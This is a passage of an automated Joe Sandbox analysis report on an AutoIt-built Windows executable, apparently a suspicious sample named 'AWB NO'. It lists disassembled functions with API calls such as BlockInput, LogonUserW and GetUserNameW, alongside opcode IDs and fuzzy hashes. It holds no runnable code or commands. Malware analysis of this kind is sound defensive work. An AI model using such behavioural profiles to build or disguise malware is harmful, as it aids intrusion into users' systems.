                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: BlockInput
                                                              • String ID:
                                                              • API String ID: 3456056419-0
                                                              • Opcode ID: 5348a02c0a25b19da91d4eee4c5d608374aceb20892a9845cfe4362b8eec5524
                                                              • Instruction ID: b23cc063588a306259b86ea8f9a474661f10e5d890b9bf3a5c7b0bdbfe370415
                                                              • Opcode Fuzzy Hash: 5348a02c0a25b19da91d4eee4c5d608374aceb20892a9845cfe4362b8eec5524
                                                              • Instruction Fuzzy Hash: 79E01A312402149FD710AF9AD844A9AB7E8AF947A0F00846AF849D7352DA74AC418BA9
                                                              Function 00464EC9 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00464EEC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: mouse_event
                                                              • String ID:
                                                              • API String ID: 2434400541-0
                                                              • Opcode ID: e93814ebc846501cb35771f2105315b05d23cebf3def32ff13cd5d2d2650ae1a
                                                              • Instruction ID: c1836423f7113560d063ef1193e36a36d4b40bb46e0c308692abb0183c679556
                                                              • Opcode Fuzzy Hash: e93814ebc846501cb35771f2105315b05d23cebf3def32ff13cd5d2d2650ae1a
                                                              • Instruction Fuzzy Hash: 0BD05EA816060539EC184B20DC5FF770108F380785FD0454BB102891C2F8DA6D55503B
                                                              Function 00458C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,004588D1), ref: 00458CB3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: LogonUser
                                                              • String ID:
                                                              • API String ID: 1244722697-0
                                                              • Opcode ID: 18205445d52b48e02bcf404b6a946f346a5f79f7dd958708f793c28153997f24
                                                              • Instruction ID: bbaf709efb0beb88cdfa5f1a33ae6004459e2c5163e494cc38a8a30eb56211a1
                                                              • Opcode Fuzzy Hash: 18205445d52b48e02bcf404b6a946f346a5f79f7dd958708f793c28153997f24
                                                              • Instruction Fuzzy Hash: 49D05E3226050EAFEF018EA4DC01EAE3B69EB04B01F408521FE15D50A1C775E835AB60
                                                              Function 00442230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetUserNameW.ADVAPI32(?,?), ref: 00442242
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: NameUser
                                                              • String ID:
                                                              • API String ID: 2645101109-0
                                                              • Opcode ID: 8a249febe551d676a54362e58b36ee3cbdd6c7cccf50f5c22d62ededf723ae2e
                                                              • Instruction ID: 9fab3e4f47dffe1bb4406c65b0cef95ea93db68453fc608ef19f458391309213
                                                              • Opcode Fuzzy Hash: 8a249febe551d676a54362e58b36ee3cbdd6c7cccf50f5c22d62ededf723ae2e
                                                              • Instruction Fuzzy Hash: 55C04CF1800109DBDB05DB90D988DEE77BCAB04304F104466A101F2110D7749B448B76
                                                              Function 0042A364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0042A36A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: de316c34264f802ad97e41e2d96b97a4976e2443a0324b54249a0beeda03384a
                                                              • Instruction ID: 5f0b767449e3d37fa0a9cb76ca1a1966b2bcebad2f74a673b8e7725f9ca30b43
                                                              • Opcode Fuzzy Hash: de316c34264f802ad97e41e2d96b97a4976e2443a0324b54249a0beeda03384a
                                                              • Instruction Fuzzy Hash: E2A0113000020CAB8A022B82EC08888BFACEA022A0B008030F80C808228B32A8208A88
                                                              Function 00468B13 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Time$FileSystem
                                                              • String ID: 0uL
                                                              • API String ID: 2086374402-4127767690
                                                              • Opcode ID: 2ef028f20e25bc989bd7b728d0492ec4ee56307afdf40b8adaedbc6f0df8c5ac
                                                              • Instruction ID: 568d74f980c1156b618d33af0ee31027dcfabcef2ac6a39b342d61d485ea9e1a
                                                              • Opcode Fuzzy Hash: 2ef028f20e25bc989bd7b728d0492ec4ee56307afdf40b8adaedbc6f0df8c5ac
                                                              • Instruction Fuzzy Hash: 7F21E4726356108FC329CF25D441B52B3E1EBA4311B288F6DE1E5CB2D0DA74B905CF98
                                                              Function 004389DF Relevance: .7, Instructions: 689COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7f8a248e2c73e718b86969d1155e04766f6c3391fd83a766129d97b2358b5f59
                                                              • Instruction ID: 6a8b6e4da1381f924555d6ff6916cf368146e98766aee06998c0193a2d4c7745
                                                              • Opcode Fuzzy Hash: 7f8a248e2c73e718b86969d1155e04766f6c3391fd83a766129d97b2358b5f59
                                                              • Instruction Fuzzy Hash: 90326771E007598FDB24CEA8C4517AEF7B2BB58310F64612FE855AB391DB789C42CB48
                                                              Function 0042F419 Relevance: .6, Instructions: 645COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
                                                              • Instruction ID: bce05383f65911ef53e75d5f2b7ae8bd864113105c6f5f1cb0bb4096b20a0191
                                                              • Opcode Fuzzy Hash: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
                                                              • Instruction Fuzzy Hash: 9A325921E29F114DD7235634D832336A258AFB73C8F95D737F819B5EA6DB28D4834208
                                                              Function 00418A0E Relevance: .6, Instructions: 608COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4f66ab0580a314d221ab9376d4eb50f49803d2a8e394490c5a9382fd7f99d6c8
                                                              • Instruction ID: 9a981ba99b4911944b9919f44c7759cb7337f05dfe0c326ced162c2a54403da9
                                                              • Opcode Fuzzy Hash: 4f66ab0580a314d221ab9376d4eb50f49803d2a8e394490c5a9382fd7f99d6c8
                                                              • Instruction Fuzzy Hash: 47222730505656CBDF288B18C4A46BF77A1EB41311F64446FE8468B392EB3C9DC6CBAD
                                                              Function 00436522 Relevance: .6, Instructions: 557COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e8d0a5d2f628565790672abce7912b68fd7d7bdb745ed91217bb3142b2bb41b4
                                                              • Instruction ID: 51dc7db5d1ebc36c4c88c344eeebc3fc370b17c1d0e8aeb1f5d31739a5fec360
                                                              • Opcode Fuzzy Hash: e8d0a5d2f628565790672abce7912b68fd7d7bdb745ed91217bb3142b2bb41b4
                                                              • Instruction Fuzzy Hash: D8129371A0151A9FDF04CFA8E8815EDBBB2FB8C314F25963EE822E7394D77469018B54
                                                              Function 00436A94 Relevance: .6, Instructions: 557COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 51ef117831ddbbec472a3704360ab7eb5f31d2a76ca69e6ccc3c9c4aeec21a10
                                                              • Instruction ID: d843cf4857001150d0aeeeedae4b50b1ed4295032995596c4a0b45a68a974ea7
                                                              • Opcode Fuzzy Hash: 51ef117831ddbbec472a3704360ab7eb5f31d2a76ca69e6ccc3c9c4aeec21a10
                                                              • Instruction Fuzzy Hash: 82126171B0151A9FDF04CFA8E8815EDBBB2FB8C310F25962EE422E7394D774A9058B54
                                                              Function 0040E060 Relevance: .5, Instructions: 539COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 70e28d0e43bd62f501e0a20eef8715171f8674f169a1734f45d0073df5b13710
                                                              • Instruction ID: 717d1ab0d90b391ed1eaae52652e6e1fa3a898975f929f0a44a13a0e96a5ed75
                                                              • Opcode Fuzzy Hash: 70e28d0e43bd62f501e0a20eef8715171f8674f169a1734f45d0073df5b13710
                                                              • Instruction Fuzzy Hash: 0822A170A00215DFDB24DF55C480AAEBBF0FF04304F14887BE956AB391D778A995CB99
                                                              Function 004158C0 Relevance: .5, Instructions: 532COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: eef3977f507b7eafe4da23d171047e94ce66d95b0b291b8b9835580735caabde
                                                              • Instruction ID: 5b2bc7ec83d53660de3bc6548dfe61299ed61e619699b898da084fa152acbb48
                                                              • Opcode Fuzzy Hash: eef3977f507b7eafe4da23d171047e94ce66d95b0b291b8b9835580735caabde
                                                              • Instruction Fuzzy Hash: 7C12AD70A00609DFDF14DFA5D981AEEB3F5FF48304F10422AE806A7291EB39AD55CB59
                                                              Function 004216C4 Relevance: .5, Instructions: 481COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 912d4ba64f2a8d41fc81dec431e87dcf331b039d4f7bbb9d104aa45bb32378a7
                                                              • Instruction ID: 47040a52b99bdd113a124e536fc649beb8df804a6c9fd7c04c433d3f96588649
                                                              • Opcode Fuzzy Hash: 912d4ba64f2a8d41fc81dec431e87dcf331b039d4f7bbb9d104aa45bb32378a7
                                                              • Instruction Fuzzy Hash: BB0209323051B309CF1D8A39A57003B7BE06EB27B134A476FE8B2CB6E1EE18D564D654
                                                              Function 00422405 Relevance: .3, Instructions: 345COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                              • Instruction ID: 3a63805bb8c2c01de1b6144fc2d7500bdbb157a027ed3d5f9b560445ff49f309
                                                              • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                              • Instruction Fuzzy Hash: C2C1C6323050B309DB2D8639A63013FBAE15EA27B139A076FE4B3CB6D4EF58D564D614
                                                              Function 0042283A Relevance: .3, Instructions: 341COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                              • Instruction ID: aaf8636ec1f05b4987ac2accbf93641bd6487308852fa21464a5fdbc51815f71
                                                              • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                              • Instruction Fuzzy Hash: 18C1B7323050B309DB2D8639A63413FBBE15EA27B139A076FE4B2DB6D4EF18D524D614
                                                              Function 00421BB8 Relevance: .3, Instructions: 323COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                              • Instruction ID: bd4c7480dd6a54fddd699a2b0be912f6d58b05d3aceaa853b4bc4e982cd790e2
                                                              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                              • Instruction Fuzzy Hash: 3FC165363051A309DB2D863AA53403FBAE15EB27B135B076FE4B2CB6E4EF18D5249614
                                                              Function 0043267E Relevance: .3, Instructions: 294COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
                                                              • Instruction ID: f8190d61f8919a36a14c9958345a37d1f486bd428d3d8603b5651c9dece39b84
                                                              • Opcode Fuzzy Hash: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
                                                              • Instruction Fuzzy Hash: E0B10030D2AF414DD7239A398935336BA8CAFBB2D5F51D72BFC2670D22EB2185934185
                                                              Function 00437006 Relevance: .2, Instructions: 197COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 13ae554fede668713c8418b731cea2a7546aabb52c717da24dcf4f4522932379
                                                              • Instruction ID: 17309c0469a5bd52ad7e8dbf9c3f61d171e4b81c5cab4c8a7a82cd1e78734ebc
                                                              • Opcode Fuzzy Hash: 13ae554fede668713c8418b731cea2a7546aabb52c717da24dcf4f4522932379
                                                              • Instruction Fuzzy Hash: 00615CB2E046268BDF28CF1DC89016AFBF6AF89300B19C1AADC59DF315D674D941CB94
                                                              Function 00477B1B Relevance: 75.7, APIs: 39, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DeleteObject.GDI32(00000000), ref: 00477B70
                                                              • DeleteObject.GDI32(00000000), ref: 00477B82
                                                              • DestroyWindow.USER32 ref: 00477B90
                                                              • GetDesktopWindow.USER32 ref: 00477BAA
                                                              • GetWindowRect.USER32(00000000), ref: 00477BB1
                                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00477CF2
                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00477D02
                                                              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477D4A
                                                              • GetClientRect.USER32(00000000,?), ref: 00477D56
                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00477D90
                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477DB2
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477DC5
